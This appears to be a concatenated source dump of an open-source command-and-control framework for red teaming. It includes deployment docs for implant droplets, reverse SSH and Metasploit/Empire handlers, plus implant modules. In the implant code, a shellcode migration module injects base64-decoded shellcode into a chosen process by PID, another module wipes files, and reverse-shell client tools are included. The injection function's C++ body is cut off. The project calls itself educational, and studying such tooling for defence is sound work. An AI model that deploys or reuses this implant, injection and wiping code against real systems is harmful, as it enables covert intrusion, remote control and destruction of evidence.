// 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | .sr-only() { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | .sr-only-focusable() { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/vps/vps.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

VPS

6 |
    7 |
  • 8 |
    • 9 |
  • 10 |
    • 11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 27 | 30 | 31 | 32 |
NameType
25 | 26 | 28 | 29 |
33 | 34 | 35 |
36 | 37 | Delete VPS 38 |
39 |
40 |
41 |
42 |
43 | -------------------------------------------------------------------------------- /src/client/electronGUI/components/domain/domain.js: -------------------------------------------------------------------------------- 1 | 2 | $(document).ready(function() { 3 | 4 | 5 | //Determine if elog is for hive,red or bichito, then load the logs for each case 6 | var name = $(".STmain").attr("id"); 7 | 8 | $("#iname").text(htmlencode.htmlEncode(name)); 9 | 10 | $("#delval").attr("value",htmlencode.htmlEncode(name)); 11 | 12 | for (i = 0; i < domains.length; i++){ 13 | if (domains[i].name == name){ 14 | var domain = domains[i]; 15 | } 16 | } 17 | 18 | $("#type").text(htmlencode.htmlEncode(domain.dtype)); 19 | $("#domain").text(htmlencode.htmlEncode(domain.domain)); 20 | $("#active").text(htmlencode.htmlEncode(domain.active)); 21 | 22 | }) 23 | 24 | /* This Job will respect the following JSON Structure on "parameters": 25 | type DeleteDomain struct{ 26 | Name string `json:"name"` 27 | } 28 | */ 29 | 30 | $("#submitdeldomain").on('click',function() { 31 | 32 | //Transform the array in one JSON STRING 33 | function objectifyForm(formArray) { 34 | var returnArray = {}; 35 | for (var i = 0; i < formArray.length; i++){ 36 | returnArray[formArray[i]['name']] = formArray[i]['value']; 37 | } 38 | return returnArray; 39 | } 40 | 41 | //Serialize form in the correct way 42 | var submitdeldomainJSON = objectifyForm($("#deldomainform").serializeArray()); 43 | 44 | //Create Job to send with two elements 45 | var data = {cid:"",jid:"",pid:"Hive",chid:"None",job:"deleteDomain",time:"",status:"",result:"",parameters:"["+JSON.stringify(submitdeldomainJSON)+"]"}; 46 | 47 | $.ajax({ 48 | type: "POST", 49 | url: "http://127.0.0.1:8000/job", 50 | data: JSON.stringify(data), 51 | contentType: "application/json; charset=utf-8", 52 | dataType: "json", 53 | success: function (response){ 54 | if (response != null){ 55 | return 56 | } 57 | } 58 | 59 | }); 60 | 61 | }); 62 | -------------------------------------------------------------------------------- /src/client/electronGUI/static/css/font-awesome-4.7.0/scss/_mixins.scss: -------------------------------------------------------------------------------- 1 | // Mixins 2 | // -------------------------- 3 | 4 | @mixin fa-icon() { 5 | display: inline-block; 6 | font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration 7 | font-size: inherit; // can't have font-size inherit on line above, so need to override 8 | text-rendering: auto; // optimizelegibility throws things off #1094 9 | -webkit-font-smoothing: antialiased; 10 | -moz-osx-font-smoothing: grayscale; 11 | 12 | } 13 | 14 | @mixin fa-icon-rotate($degrees, $rotation) { 15 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation})"; 16 | -webkit-transform: rotate($degrees); 17 | -ms-transform: rotate($degrees); 18 | transform: rotate($degrees); 19 | } 20 | 21 | @mixin fa-icon-flip($horiz, $vert, $rotation) { 22 | -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=#{$rotation}, mirror=1)"; 23 | -webkit-transform: scale($horiz, $vert); 24 | -ms-transform: scale($horiz, $vert); 25 | transform: scale($horiz, $vert); 26 | } 27 | 28 | 29 | // Only display content to screen readers. A la Bootstrap 4. 30 | // 31 | // See: http://a11yproject.com/posts/how-to-hide-content/ 32 | 33 | @mixin sr-only { 34 | position: absolute; 35 | width: 1px; 36 | height: 1px; 37 | padding: 0; 38 | margin: -1px; 39 | overflow: hidden; 40 | clip: rect(0,0,0,0); 41 | border: 0; 42 | } 43 | 44 | // Use in conjunction with .sr-only to only display content when it's focused. 45 | // 46 | // Useful for "Skip to main content" links; see http://www.w3.org/TR/2013/NOTE-WCAG20-TECHS-20130905/G1 47 | // 48 | // Credit: HTML5 Boilerplate 49 | 50 | @mixin sr-only-focusable { 51 | &:active, 52 | &:focus { 53 | position: static; 54 | width: auto; 55 | height: auto; 56 | margin: 0; 57 | overflow: visible; 58 | clip: auto; 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /docs/deployment/postservers.rst: -------------------------------------------------------------------------------- 1 | Post. Servers 2 | =========================== 3 | 4 | 5 | .. figure:: ../_static/images/deployment/deploypost.png 6 | :align: center 7 | :figwidth: 600px 8 | :target: ../_static/images/deployment/deploypost.png 9 | 10 | Droplet 11 | -------------------------------------------- 12 | 13 | A plain ubuntu Server used to drop created Implants 14 | 15 | Name → Just the name of the resource 16 | VPS/Domain → Choose one from the battery 17 | Https Port 18 | Path for Implant folder → ``/var/www/”path”/implant`` 19 | Endpoint: ``https://domain/implantpath/implant`` 20 | 21 | .. figure:: ../_static/images/deployment/droplet.png 22 | :align: right 23 | :figwidth: 300px 24 | :target: ../_static/images/deployment/droplet.png 25 | 26 | Reverse SSH 27 | -------------------------------------------------- 28 | 29 | The reverse SSH will create a ubuntu Server with a sshd connection and a “anonymous” user configured with its own keys. 30 | This user is configured without a bash shell, the idea is that the implant will connect with that anonymous user and serve its own SSHD Server from Golang Code. 31 | 32 | In this way, what it looks from the foothold as a SSH outbound connection, will be a remote bash/cmd serving. 33 | ***[More details in developer Guide]*** 34 | 35 | 36 | .. warning:: 37 | For the moment these SSH are not fully interactive 38 | 39 | Reverse RDESKTOP 40 | -------------------------------------------------- 41 | 42 | TBD 43 | 44 | 45 | Empire, Metasploit 46 | -------------------------------------------------- 47 | 48 | .. figure:: ../_static/images/deployment/msftworking.png 49 | :align: right 50 | :figwidth: 300px 51 | :target: ../_static/images/deployment/msftworking.png 52 | 53 | Similarly to the reverse SSH server, Empire and MSFT will create remote handlers to receive incoming shells. 54 | ***The handler is configured with https self signed certificates.*** 55 | You can choose the handler port 56 | 57 | -------------------------------------------------------------------------------- /installConfig/instScriptNoDarwin.sh: -------------------------------------------------------------------------------- 1 | #Terraform Configs 2 | sudo cp /usr/local/STHive/sources/src/infra/.terraformrc /root/.terraformrc 3 | 4 | #Modified Golang Source Code Dependencies 5 | #crypto/tls 6 | #cp /usr/local/STHive/sources/src/rebugo/tls/* /usr/local/STHive/sources/go/src/crypto/tls/. 7 | #golang.org/x/oauth2 8 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/oauth2.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 9 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 10 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/internal/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/internal/. 11 | #google.golang.org/api/gmail/v1 12 | #cp /usr/local/STHive/sources/src/rebugo/gmail/v1/gmail-gen.go /usr/local/STHive/sources/src/google.golang.org/api/gmail/v1/. 13 | 14 | #Objective-C/Cocoa Cross-Compilation:darwin - osxcross 15 | #sudo wget https://github.com/tpoechtrager/osxcross/archive/master.zip 16 | #sudo unzip master.zip 17 | #sudo mv osxcross-master/ /usr/local/STHive/sources/osxcross 18 | #sudo mv /usr/local/STHive/MacOSX10.13.sdk.tar.xz /usr/local/STHive/sources/osxcross/tarballs/ 19 | #sudo rm master.zip 20 | #cd /usr/local/STHive/sources/osxcross/ 21 | #sudo bash ./tools/get_dependencies.sh 22 | #sudo yes | sudo ./build.sh 23 | 24 | #Dependencies for windows c++ code 25 | sudo mkdir /usr/local/STHive/sources/winDependencies 26 | sudo unzip /usr/local/STHive/windependencies.zip -d /usr/local/STHive/sources/winDependencies 27 | 28 | #Hive Service Configs 29 | sudo chmod +x /usr/local/STHive/hive 30 | sudo cp /usr/local/STHive/hive.service /etc/systemd/system/ 31 | sudo chmod 664 /etc/systemd/system/hive.service 32 | sudo systemctl daemon-reload 33 | sudo systemctl enable hive.service 34 | sudo chown root:root -R /usr/local/STHive/ 35 | cd /usr/local/STHive/ 36 | HIVEIP=$(curl http://169.254.169.254/latest/meta-data/public-ipv4) 37 | sqlite3 ./ST.db < 2 |
3 |
4 |
5 |

Domain

6 |
    7 |
  • 8 |
    • 9 |
  • 10 |
    • 11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 32 | 35 | 38 | 39 | 40 |
NameTypeActiveDomain
27 | 28 | 30 | 31 | 33 | 34 | 36 | 37 |
41 |
42 |
43 |
44 | 45 | 46 |
47 | 48 | Delete Domain 49 |
50 |
51 | 52 | -------------------------------------------------------------------------------- /installConfig/instScript.sh: -------------------------------------------------------------------------------- 1 | 2 | #After the "hive.tf" plan is finished, there are still some actions to prform within the Hive Server, this script will execute the 3 | #rest of needed commands 4 | 5 | 6 | #Terraform Configs 7 | sudo cp /usr/local/STHive/sources/src/infra/.terraformrc /root/.terraformrc 8 | 9 | #Modified Golang Source Code Dependencies 10 | #crypto/tls 11 | #cp /usr/local/STHive/sources/src/rebugo/tls/* /usr/local/STHive/sources/go/src/crypto/tls/. 12 | #golang.org/x/oauth2 13 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/oauth2.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 14 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/. 15 | #cp /usr/local/STHive/sources/src/rebugo/oauth2/internal/token.go /usr/local/STHive/sources/src/golang.org/x/oauth2/internal/. 16 | #google.golang.org/api/gmail/v1 17 | #cp /usr/local/STHive/sources/src/rebugo/gmail/v1/gmail-gen.go /usr/local/STHive/sources/src/google.golang.org/api/gmail/v1/. 18 | 19 | #Objective-C/Cocoa Cross-Compilation:darwin - osxcross 20 | sudo wget https://github.com/tpoechtrager/osxcross/archive/master.zip 21 | sudo unzip master.zip 22 | sudo mv osxcross-master/ /usr/local/STHive/sources/osxcross 23 | sudo mv /usr/local/STHive/MacOSX10.13.sdk.tar.xz /usr/local/STHive/sources/osxcross/tarballs/ 24 | sudo rm master.zip 25 | cd /usr/local/STHive/sources/osxcross/ 26 | sudo bash ./tools/get_dependencies.sh 27 | sudo yes | sudo ./build.sh 28 | 29 | #Dependencies for windows c++ code 30 | sudo mkdir /usr/local/STHive/sources/winDependencies 31 | sudo unzip /usr/local/STHive/windependencies.zip -d /usr/local/STHive/sources/winDependencies 32 | 33 | #Hive Service Configs 34 | sudo chmod +x /usr/local/STHive/hive 35 | sudo cp /usr/local/STHive/hive.service /etc/systemd/system/ 36 | sudo chmod 664 /etc/systemd/system/hive.service 37 | sudo systemctl daemon-reload 38 | sudo systemctl enable hive.service 39 | sudo chown root:root -R /usr/local/STHive/ 40 | cd /usr/local/STHive/ 41 | HIVEIP=$(curl http://169.254.169.254/latest/meta-data/public-ipv4) 42 | sqlite3 ./ST.db < 20 | */ 21 | import "C" 22 | 23 | 24 | type BiMigrate struct { 25 | Shellcode string `json:"shellcode"` 26 | Pid string `json:"pid"` 27 | } 28 | 29 | var moduleParams *BiMigrate 30 | 31 | 32 | func Migrate(jsonMigrate string) (bool,string){ 33 | 34 | errDaws := json.Unmarshal([]byte(jsonMigrate),&moduleParams) 35 | if errDaws != nil{ 36 | return true,"Error Decoding Migrate Module Params:" + errDaws.Error() 37 | } 38 | 39 | //Decode Binary shellcode string 40 | shellcodeBin,errDecode := base64.StdEncoding.DecodeString(moduleParams.Shellcode) 41 | if errDecode != nil { 42 | return true,"Error b64 decoding shellcode" 43 | } 44 | 45 | 46 | //Extract PID from migrate params 47 | arguments := strings.Split(moduleParams.Pid," ") 48 | if len(arguments) != 1 { 49 | return true,"Incorrect Number of params for Migration" 50 | } 51 | 52 | var ptrShellcode *C.char = C.CString(string(shellcodeBin)) 53 | defer C.free(unsafe.Pointer(ptrShellcode)) 54 | 55 | var size_shellcode C.int = C.int(len(shellcodeBin)) 56 | 57 | i, err := strconv.Atoi(arguments[0]) 58 | if err != nil { 59 | return true,"Incorrect Integer for PID within Migration command" 60 | } 61 | 62 | var pid C.int = C.int(i) 63 | 64 | ptrError := C.malloc(C.sizeof_char * 1024) 65 | defer C.free(unsafe.Pointer(ptrError)) 66 | 67 | error := C.Migrate((*C.char)(ptrShellcode),size_shellcode,pid,(*C.char)(ptrError)) 68 | 69 | errorString := C.GoString((*C.char)(ptrError)) 70 | if (error != 1){ 71 | 72 | return true,"Migrate Error:" + string(errorString) 73 | } 74 | 75 | return false,"Migration Completed" 76 | } 77 | -------------------------------------------------------------------------------- /stime.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Installer: 4 | # 5 | # installConfig/ 6 | # config.txt 7 | # hive.tf 8 | # installSTime.sh --> Will just work over installConfig folder 9 | # 1. Read properties of config.txt and create variables 10 | # 2. Parse/Prepare hive.tf 11 | # 3. Use terraform to deploy hive to VPS 12 | 13 | 14 | 15 | # Check if an installation already exists 16 | 17 | case "$1" in 18 | 19 | "remove" ) 20 | cd ./installConfig/ 21 | rm stclient 22 | rm -rf electronGUI 23 | rm -rf go* 24 | rm -rf vpskeys/* 25 | rm -rf reports/* 26 | rm -rf downloads/* 27 | rm -rf ../src/github.com/ 28 | rm -rf ../src/golang.org/ 29 | rm -rf ../src/google.golang.org/ 30 | rm -rf ../src/go.opencensus.io/ 31 | rm -rf ../src/cloud.google.com/ 32 | rm -rf ../pkg 33 | rm -rf npm-debug.log 34 | ;; 35 | 36 | 37 | "install" ) 38 | 39 | #Prepare User inputs to install client 40 | USERNAME=$2 41 | PASSWORD=$3 42 | HASH=$(htpasswd -bnBC 14 "" ${PASSWORD} | tr -d ':\n') 43 | HIVIP=$4 44 | HIVPORT=$5 45 | CLIENTPORT=$6 46 | HIVTLSHASH=$7 47 | 48 | #Required Software to compile client 49 | sudo apt-get update 50 | sudo apt-get install gcc unzip 51 | 52 | # Download GO and Compile Hive 53 | wget https://golang.org/dl/go1.16.linux-amd64.tar.gz -P ./installConfig/ 54 | tar xvf ./installConfig/go1.16.linux-amd64.tar.gz -C ./installConfig/ 55 | export GOROOT="$(pwd)/installConfig/go/" 56 | export GOPATH="$(pwd)" 57 | 58 | #Compile client with target variables and prepare electron front-end 59 | cd ./installConfig 60 | GO111MODULE=off ./go/bin/go get "github.com/gorilla/mux" 61 | GO111MODULE=off GOOS=linux GOARCH=amd64 ./go/bin/go build --ldflags "-X main.username=${USERNAME} -X main.password=${PASSWORD} -X main.roasterString=${HIVIP}:${HIVPORT} -X main.fingerPrint=${HIVTLSHASH} -X main.clientPort=${CLIENTPORT}" -o stclient client 62 | 63 | 64 | cp -r ../src/client/electronGUI/ . 65 | cd electronGUI/ 66 | find . -type f | xargs sed -i "s/127\.0\.0\.1:8000/127\.0\.0\.1:${CLIENTPORT}/g" 67 | sudo apt-get install -y npm 68 | npm install 69 | 70 | exit 1 71 | ;; 72 | 73 | *) cd ./installConfig/ 74 | ./stclient & 75 | sleep 20s 76 | cd electronGUI 77 | npm start 78 | pkill stclient 79 | exit 1 80 | ;; 81 | esac 82 | 83 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows_x64.go: -------------------------------------------------------------------------------- 1 | // +build amd64 2 | 3 | package migrate_remote_thread_windows 4 | 5 | import ( 6 | 7 | //"fmt" 8 | //"io/ioutil" 9 | //"os" 10 | "unsafe" 11 | "encoding/json" 12 | "strings" 13 | "strconv" 14 | "encoding/base64" 15 | ) 16 | 17 | 18 | /* 19 | #cgo CXXFLAGS: -I"../../../../../winDependencies/includes/" 20 | #cgo LDFLAGS: -L"../../../../../winDependencies/libs/x64/" -static 21 | #include "migrate_remote_thread_windows.h" 22 | #include 23 | */ 24 | import "C" 25 | 26 | 27 | type BiMigrate struct { 28 | Shellcode string `json:"shellcode"` 29 | Pid string `json:"pid"` 30 | } 31 | 32 | var moduleParams *BiMigrate 33 | 34 | 35 | func Migrate(jsonMigrate string) (bool,string){ 36 | 37 | errDaws := json.Unmarshal([]byte(jsonMigrate),&moduleParams) 38 | if errDaws != nil{ 39 | return true,"Error Decoding Migrate Module Params:" + errDaws.Error() 40 | } 41 | 42 | //Decode Binary shellcode string 43 | shellcodeBin,errDecode := base64.StdEncoding.DecodeString(moduleParams.Shellcode) 44 | if errDecode != nil { 45 | return true,"Error b64 decoding shellcode" 46 | } 47 | 48 | 49 | //Extract PID from migrate params 50 | arguments := strings.Split(moduleParams.Pid," ") 51 | if len(arguments) != 1 { 52 | return true,"Incorrect Number of params for Migration" 53 | } 54 | 55 | var ptrShellcode *C.char = C.CString(string(shellcodeBin)) 56 | defer C.free(unsafe.Pointer(ptrShellcode)) 57 | 58 | var size_shellcode C.int = C.int(len(shellcodeBin)) 59 | 60 | i, err := strconv.Atoi(arguments[0]) 61 | if err != nil { 62 | return true,"Incorrect Integer for PID within Migration command" 63 | } 64 | 65 | var pid C.int = C.int(i) 66 | 67 | ptrError := C.malloc(C.sizeof_char * 1024) 68 | defer C.free(unsafe.Pointer(ptrError)) 69 | 70 | error := C.Migrate((*C.char)(ptrShellcode),size_shellcode,pid,(*C.char)(ptrError)) 71 | 72 | errorString := C.GoString((*C.char)(ptrError)) 73 | if (error != 1){ 74 | 75 | return true,"Migrate Error:" + string(errorString) 76 | } 77 | 78 | return false,"Migration Completed" 79 | } 80 | -------------------------------------------------------------------------------- /src/tools/tools.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Tools Main Function }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | /* 4 | Sources: 5 | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ 6 | https://gist.github.com/napicella/777e83c0ef5b77bf72c0a5d5da9a4b4e 7 | */ 8 | 9 | package main 10 | 11 | import ( 12 | 13 | "io" 14 | "os" 15 | "net" 16 | "golang.org/x/crypto/ssh/terminal" 17 | "fmt" 18 | ) 19 | 20 | func main() { 21 | 22 | if (len(os.Args) < 2){ 23 | fmt.Println("Not Enough Arguments") 24 | return 25 | } 26 | 27 | switch os.Args[1]{ 28 | 29 | case "revsshclientLinDar": 30 | _,result := ConnectRevSshShellLinDarwin("127.0.0.1",os.Args[2]) 31 | fmt.Println(result) 32 | 33 | case "revsshclientClassicCMD": 34 | _,result := ConnectRevSshClassicCMD("127.0.0.1",os.Args[2]) 35 | fmt.Println(result) 36 | default: 37 | fmt.Println("Not Toolset Command") 38 | } 39 | 40 | } 41 | 42 | func ConnectRevSshShellLinDarwin(domain string,port string) (bool,string){ 43 | 44 | // connect to this socket 45 | conn, e := net.Dial("tcp", domain+":"+port) 46 | if e != nil { 47 | return true,"Error connecting ssh socket: "+e.Error() 48 | } 49 | 50 | // MakeRaw put the terminal connected to the given file descriptor into raw 51 | // mode and returns the previous state of the terminal so that it can be 52 | // restored. 53 | oldState, e := terminal.MakeRaw(int(os.Stdin.Fd())) 54 | if e != nil { 55 | return true,"Error making raw terminal: "+e.Error() 56 | } 57 | defer func() { _ = terminal.Restore(int(os.Stdin.Fd()), oldState) }() 58 | 59 | go func() { _, _ = io.Copy(os.Stdout, conn) }() 60 | _, e = io.Copy(conn, os.Stdin) 61 | 62 | return false,"Session Finished" 63 | 64 | } 65 | 66 | func ConnectRevSshClassicCMD(domain string,port string) (bool,string){ 67 | 68 | // connect to this socket 69 | conn, e := net.Dial("tcp", domain+":"+port) 70 | if e != nil { 71 | return true,"Error connecting ssh socket: "+e.Error() 72 | } 73 | 74 | go func() { _, _ = io.Copy(os.Stdout, conn) }() 75 | _, e = io.Copy(conn, os.Stdin) 76 | 77 | return false,"Session Finished" 78 | 79 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/createforms/createStaging.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Generate Staging

6 |
7 |
8 |
9 | 10 |
11 | 12 |
13 | 14 | 15 |
16 | 17 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 36 | 40 | 41 |
VPSDomain
33 | 35 | 37 | 39 |
42 |
43 |
44 | 45 |
46 | 47 |
48 |
49 |
50 |
51 | 52 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/wipef_trio.go: -------------------------------------------------------------------------------- 1 | // +build linux darwin windows 2 | 3 | package biterpreter 4 | 5 | import ( 6 | "math" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | /* 12 | Description: Wipe File--> Linux,Darwin,Windows. 13 | Flow: 14 | A.Wipe target PATH File. 15 | */ 16 | func Wipe(commands string) (bool,string){ 17 | 18 | arguments := strings.Split(commands," ") 19 | if len(arguments) != 1 { 20 | return true,"Incorrect Number of params" 21 | } 22 | 23 | var targetFile = arguments[0] 24 | 25 | // make sure we open the file with correct permission 26 | // otherwise we will get the 27 | // bad file descriptor error 28 | file, err := os.OpenFile(targetFile, os.O_RDWR, 0666) 29 | 30 | if err != nil { 31 | return true,"Error Opening File to wipe: "+ err.Error() 32 | } 33 | 34 | defer file.Close() 35 | 36 | // find out how large is the target file 37 | fileInfo, err := file.Stat() 38 | if err != nil { 39 | return true,"Error Opening File to wipe: "+ err.Error() 40 | } 41 | 42 | // calculate the new slice size 43 | // base on how large our target file is 44 | 45 | var fileSize int64 = fileInfo.Size() 46 | const fileChunk = 1 * (1 << 20) // 1 MB, change this to your requirement 47 | 48 | // calculate total number of parts the file will be chunked into 49 | totalPartsNum := uint64(math.Ceil(float64(fileSize) / float64(fileChunk))) 50 | 51 | lastPosition := 0 52 | 53 | for i := uint64(0); i < totalPartsNum; i++ { 54 | 55 | partSize := int(math.Min(fileChunk, float64(fileSize-int64(i*fileChunk)))) 56 | partZeroBytes := make([]byte, partSize) 57 | 58 | // fill out the part with zero value 59 | copy(partZeroBytes[:], "0") 60 | 61 | // over write every byte in the chunk with 0 62 | _, err := file.WriteAt([]byte(partZeroBytes), int64(lastPosition)) 63 | 64 | if err != nil { 65 | return true,"Error Overwriting File to wipe: "+ err.Error() 66 | } 67 | 68 | // update last written position 69 | lastPosition = lastPosition + partSize 70 | } 71 | 72 | file.Close() 73 | // finally remove/delete our file 74 | err = os.Remove(targetFile) 75 | 76 | if err != nil { 77 | return true,"Error Removing File to wipe: "+ err.Error() 78 | } 79 | 80 | return false,"File Wiped" 81 | 82 | } -------------------------------------------------------------------------------- /src/client/electronGUI/main.js: -------------------------------------------------------------------------------- 1 | // Modules to control application life and create native browser window 2 | const {app, BrowserWindow} = require('electron') 3 | var path = require('path') 4 | 5 | // Keep a global reference of the window object, if you don't, the window will 6 | // be closed automatically when the JavaScript object is garbage collected. 7 | let mainWindow 8 | 9 | function createWindow () { 10 | // Create the browser window. 11 | mainWindow = new BrowserWindow({ 12 | //Activate Node Integration ofr load "require" libraries 13 | webPreferences: { 14 | nodeIntegration: true 15 | }, 16 | 17 | width: 1800, 18 | height: 1200, 19 | icon: path.join(__dirname, 'static/icons/png/STicon.png') 20 | 21 | }) 22 | 23 | // and load the index.html of the app. 24 | //mainWindow.loadFile('gentelella/production/myindex.html') 25 | mainWindow.loadFile('index.html') 26 | 27 | // Open the DevTools. 28 | // mainWindow.webContents.openDevTools() 29 | 30 | // Emitted when the window is closed. 31 | mainWindow.on('closed', function () { 32 | // Dereference the window object, usually you would store windows 33 | // in an array if your app supports multi windows, this is the time 34 | // when you should delete the corresponding element. 35 | mainWindow = null 36 | }) 37 | 38 | 39 | } 40 | 41 | // This method will be called when Electron has finished 42 | // initialization and is ready to create browser windows. 43 | // Some APIs can only be used after this event occurs. 44 | app.on('ready', createWindow) 45 | 46 | 47 | // Quit when all windows are closed. 48 | app.on('window-all-closed', function () { 49 | // On macOS it is common for applications and their menu bar 50 | // to stay active until the user quits explicitly with Cmd + Q 51 | if (process.platform !== 'darwin') { 52 | app.quit() 53 | } 54 | }) 55 | 56 | app.on('activate', function () { 57 | // On macOS it's common to re-create a window in the app when the 58 | // dock icon is clicked and there are no other windows open. 59 | if (mainWindow === null) { 60 | createWindow() 61 | } 62 | }) 63 | 64 | // In this file you can include the rest of your app's specific main process 65 | // code. You can also put them in separate files and require them here. 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | -------------------------------------------------------------------------------- /src/client/clientMisc.go: -------------------------------------------------------------------------------- 1 | //{{{{{{{ Client Miscelanious Functions and external sources }}}}}}} 2 | //By Rebujacker - Alvaro Folgado Rueda as an open source educative project 3 | 4 | package main 5 | 6 | import ( 7 | "time" 8 | "math/rand" 9 | //"strconv" 10 | "regexp" 11 | ) 12 | 13 | //// Extra functions to help Hive with different tasks: 14 | // A. randomString (from: https://www.calhoun.io/creating-random-strings-in-go/) 15 | func randomString(length int) string{ 16 | 17 | charset := "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 18 | var seededRand *rand.Rand = rand.New(rand.NewSource(time.Now().UnixNano())) 19 | b := make([]byte, length) 20 | for i := range b { 21 | b[i] = charset[seededRand.Intn(len(charset))] 22 | } 23 | 24 | return string(b) 25 | } 26 | 27 | 28 | // Some Input Sanitation Functions (to Improve...) 29 | 30 | func gmailInputWhite(input string) bool{ 31 | 32 | if (len(input) > 5000){ 33 | return false 34 | } 35 | return true 36 | 37 | } 38 | 39 | func accessKeysInputWhite(input string) bool{ 40 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=]{1,200}$`).MatchString 41 | return white(input) 42 | 43 | } 44 | 45 | func rsaKeysInputWhite(input string) bool{ 46 | 47 | //var white = regexp.MustCompile(`^[a-zA-Z0-9\-\.\+_/=\s]$`).MatchString 48 | if (len(input) > 5000){ 49 | return false 50 | } 51 | return true 52 | } 53 | 54 | 55 | func namesInputWhite(input string) bool{ 56 | var white = regexp.MustCompile(`^[a-zA-Z0-9]{1,20}$`).MatchString 57 | return white(input) 58 | } 59 | 60 | func idsInputWhite(input string) bool{ 61 | var white = regexp.MustCompile(`^[a-zA-Z0-9\-]{1,20}$`).MatchString 62 | return white(input) 63 | } 64 | 65 | func filesInputWhite(input string) bool{ 66 | var white = regexp.MustCompile(`^[\w.-]{1,20}$`).MatchString 67 | return white(input) 68 | } 69 | 70 | func numbersInputWhite(input string) bool{ 71 | var white = regexp.MustCompile(`^[0-9]{1,200}$`).MatchString 72 | return white(input) 73 | } 74 | 75 | func domainsInputWhite(input string) bool{ 76 | var white = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]\.[a-zA-Z]{2,}$`).MatchString 77 | 78 | //For Ipv4 Address 79 | var white2 = regexp.MustCompile(`^(?:(?:^|\.)(?:2(?:5[0-5]|[0-4]\d)|1?\d?\d)){4}$`).MatchString 80 | var result = (white(input) || white2(input)) 81 | return result 82 | } 83 | 84 | func tcpPortInputWhite(input string) bool{ 85 | var white = regexp.MustCompile(`^()([1-9]|[1-5]?[0-9]{2,4}|6[1-4][0-9]{3}|65[1-4][0-9]{2}|655[1-2][0-9]|6553[1-5])$`).MatchString 86 | return white(input) 87 | 88 | } -------------------------------------------------------------------------------- /src/client/electronGUI/components/staging/staging.html: -------------------------------------------------------------------------------- 1 |
2 |
3 |
4 |
5 |

Staging

6 |
    7 |
  • 8 |
    • 9 |
  • 10 |
    • 11 |
12 |
13 |
14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 29 | 32 | 35 | 38 | 39 | 40 |
NameTypeVPSDomain
27 | 28 | 30 | 31 | 33 | 34 | 36 | 37 |
41 | 42 |
43 |
44 | 45 |
46 | 47 | 48 | 55 | 56 | 57 |
58 |
59 | 60 | 61 | 62 |
63 |
64 |
65 |
66 | 67 | -------------------------------------------------------------------------------- /src/bichito/modules/biterpreter/migrate_remote_thread_windows/migrate_remote_thread_windows.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include "migrate_remote_thread_windows.h" 3 | #include 4 | #include 5 | 6 | 7 | std::string GetLastErrorAsString() 8 | { 9 | //Get the error message ID, if any. 10 | DWORD errorMessageID = ::GetLastError(); 11 | if (errorMessageID == 0) { 12 | return std::string(); //No error message has been recorded 13 | } 14 | 15 | LPSTR messageBuffer = nullptr; 16 | 17 | //Ask Win32 to give us the string version of that message ID. 18 | //The parameters we pass in, tell Win32 to create the buffer that holds the message for us (because we don't yet know how long the message string will be). 19 | size_t size = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 20 | NULL, errorMessageID, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&messageBuffer, 0, NULL); 21 | 22 | //Copy the error message into a std::string. 23 | std::string message(messageBuffer, size); 24 | 25 | //Free the Win32's string's buffer. 26 | LocalFree(messageBuffer); 27 | 28 | return message; 29 | } 30 | 31 | int Migrate(char* shellcode, int size_shellcode,int pid,char* 